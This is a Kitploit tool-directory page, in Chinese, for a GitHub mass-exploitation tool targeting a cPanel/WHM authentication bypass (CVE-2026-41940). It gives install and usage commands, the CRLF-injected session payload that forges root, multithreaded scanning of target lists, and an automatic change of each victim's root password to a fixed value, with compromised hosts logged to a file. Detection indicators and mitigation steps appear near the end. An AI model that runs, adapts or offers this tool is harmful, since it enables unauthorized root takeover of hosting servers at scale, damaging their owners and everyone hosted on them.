Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — 针对 cPanel/WHM 上 CVE-2026-41940 的批量扫描与大规模利用工具,专为自动化目标验证和高速多线程执行而构建。 | Kitploit
工具/GitHubGitHub/jenderal92/cve-2026-41940
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试命令与控制身份验证红队Payload 开发
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

针对 cPanel/WHM 上 CVE-2026-41940 的批量扫描与大规模利用工具,专为自动化目标验证和高速多线程执行而构建。

44254个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2026-41940 - WHM/cPanel 认证绕过批量利用工具

43153

📋 描述

CVE-2026-41940 是 WHM/cPanel 中的一个严重 认证绕过 漏洞,攻击者无需有效凭据即可绕过认证并获得服务器的 root 访问权限。该漏洞利用了会话处理机制中的 CRLF 注入来注入恶意会话参数。

本工具提供 批量利用 能力,支持多线程同时测试多个目标,具备智能成功检测和自动过滤无效目标的功能。


🎯 主要功能

功能描述
✅ 批量利用从列表文件扫描并利用多个目标
🚀 多线程可配置线程数以加快扫描速度(默认:15)
🔐 自动更改密码利用成功后自动将 root 密码更改为 Jenderal92
🛡️ 智能成功检测自动检测各种 WHM API 响应格式
⚠️ 许可错误过滤排除出现无效/无法读取许可证错误的目标
📝 结构化输出仅将以 `domain:port
🛡️ SSL/TLS 支持自动处理自签名证书
🔄 会话管理自动进行会话提取、Cookie 注入和令牌处理
⏱️ 超时控制可配置连接超时(默认:15 秒)
🔍 连接前检查在尝试利用前验证端口可用性
📊 实时进度显示每个利用阶段的详细进度

📦 要求

  • Python 2.7(必需 - 与 Python 3.x 不兼容)
  • 互联网连接,用于访问目标
  • 所需的 Python 包:
pip install requests urllib3 futures

或使用 requirements.txt:

requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 安装

# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Install dependencies
pip install -r requirements.txt

# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 使用方法

1. 准备目标文件

创建一个 targets.txt 文件,每行一个目标:

https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

注意: 端口 2087 是 WHM 默认端口。如果未指定,将自动使用 2087 端口。若缺少 HTTP/HTTPS 前缀,也会自动添加。

2. 运行利用程序

基本用法(默认设置)

python2 CVE-2026-41940.py targets.txt

多线程用法

# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5

# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20

自定义主机名

# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

自定义超时

# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 命令行参数

参数描述默认值必需
list_file包含目标列表的文件(每行一个)-✅ 是
--threads并发线程数15❌ 否
--hostname为所有目标覆盖 Host 头自动发现❌ 否
--timeout连接超时(秒)15❌ 否

📁 输出格式

结果文件(res.txt)

仅保存确认成功的利用目标。带有许可错误、密码更改失败或连接问题的目标会被自动排除。

格式:

domain:port|root|Jenderal92

示例输出:

www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

排除情形

以下目标 不会 被保存到 res.txt:

  • 许可错误(Cannot Read License File)
  • 密码更改失败
  • 连接超时或拒绝
  • 已修补/未运行 WHM 的目标
  • 凭据错误或会话失败

控制台输出

$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 利用原理

该利用程序包含 4 个主要阶段,并带有智能验证:

第 1 阶段:预认证会话

[1] minting a preauth session...
  • 向 /login/?login_only=1 发送带有无效凭据的 POST 请求
  • 从服务器响应中获取 whostmgrsession Cookie
  • 通过移除尾部 ,<obhex> 部分提取会话基础
  • 这为我们提供了一个可操作的合法会话格式

第 2 阶段:CRLF 注入攻击

[2] sending the CRLF injection...
  • 发送带有包含恶意载荷的 Authorization: Basic 头的 GET 请求
  • Base64 载荷解码后为:
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • CRLF(\r\n)字符会注入伪造的会话参数
  • 这会让服务器误以为认证已成功
  • 服务器以 HTTP 307 响应,并在 Location 头中包含 cp_security_token

第 3 阶段:会话传播

[3] firing do_token_denied to propagate...
  • 使用篡改后的 Cookie 访问 /scripts2/listaccts 端点
  • 触发 WHM 中的 do_token_denied 机制
  • 从而将注入的会话参数传播到服务器的会话缓存中
  • HTTP 401 响应中的 “Token denied” 确认传播成功

第 4 阶段:验证与密码更改

[4] verifying we're WHM root...
  • 访问 /json-api/version 以验证 root 级访问权限
  • 调用 /json-api/passwd API 将 root 密码更改为 Jenderal92
  • 智能检测多种 WHM API 响应格式中的成功标志:
    • {"metadata": {"result": 1}}(cPanel v11.118+)
    • {"status": 1}(旧版本)
    • {"result": [{"status": 1}]}(传统格式)
    • 基于文本的成功消息

自动过滤

该工具会自动排除:

  • 许可错误:{"status": 0, "statusmsg": "Cannot Read License File"}
  • 密码更改失败:API 返回成功代码但密码未实际更改
  • 连接问题:超时、连接被拒绝、目标不可达

🛡️ 检测与缓解

入侵指标(IOCs)

指标描述
异常的 whostmgrsession Cookie未经正常认证的异常 Cookie 模式
头中的 CRLF 字符检测 HTTP 头中的 \r\n 序列
访问 /scripts2/listaccts未经授权访问该路径
密码 Jenderal92使用此特定密码成功登录
cpsess 令牌泄露安全令牌出现在 Location 头中
登录失败后即成功先向 /login/?login_only=1 发送错误密码 POST,随后获得特权访问

需监控的日志

# WHM access log
/usr/local/cpanel/logs/access_log

# cPanel error log  
/usr/local/cpanel/logs/error_log

# Authentication log
/var/log/secure

# System messages
/var/log/messages

缓解步骤

  1. 立即将 WHM/cPanel 更新到最新修补版本

    /usr/local/cpanel/scripts/upcp
    
  2. 为所有账户(尤其是 root)启用双因素认证(2FA)

    WHM → Security Center → Two-Factor Authentication
    
  3. 通过 IP 白名单限制 WHM 访问

    WHM → Security Center → Host Access Control
    
  4. 定期监控访问日志中的可疑模式

    tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
    
  5. 如果怀疑遭到入侵,更改所有密码

  6. 使用防火墙规则限制对 2087 端口的访问

    # Allow only trusted IPs
    iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
    iptables -A INPUT -p tcp --dport 2087 -j DROP
    
    # Or use CSF/LFD firewall
    csf -a YOUR_TRUSTED_IP
    
  7. 部署 WAF 规则以检测 CRLF 注入尝试

  8. 对 WHM/cPanel 安装进行定期安全审计


📝 不同场景下的使用示例

场景 1:单目标测试

echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1

场景 2:批量服务器审计

python2 CVE-2026-41940.py all_servers.txt --threads 20 --timeout 20

场景 3:慢速网络/远距离

python2 CVE-2026-41940.py servers.txt --threads 5 --timeout 45

场景 4:代理/负载均衡器后的自定义主机名

python2 CVE-2026-41940.py servers.txt --hostname internal.cpanel.server --threads 10

场景 5:混合端口目标

# targets.txt can contain various formats:
https://server1.com:2087
http://server2.com:2087
server3.com:2087
127.0.0.1:2087
10.0.0.50

# All will be normalized automatically
python2 CVE-2026-41940.py targets.txt --threads 15

⚙️ 故障排除

下载工具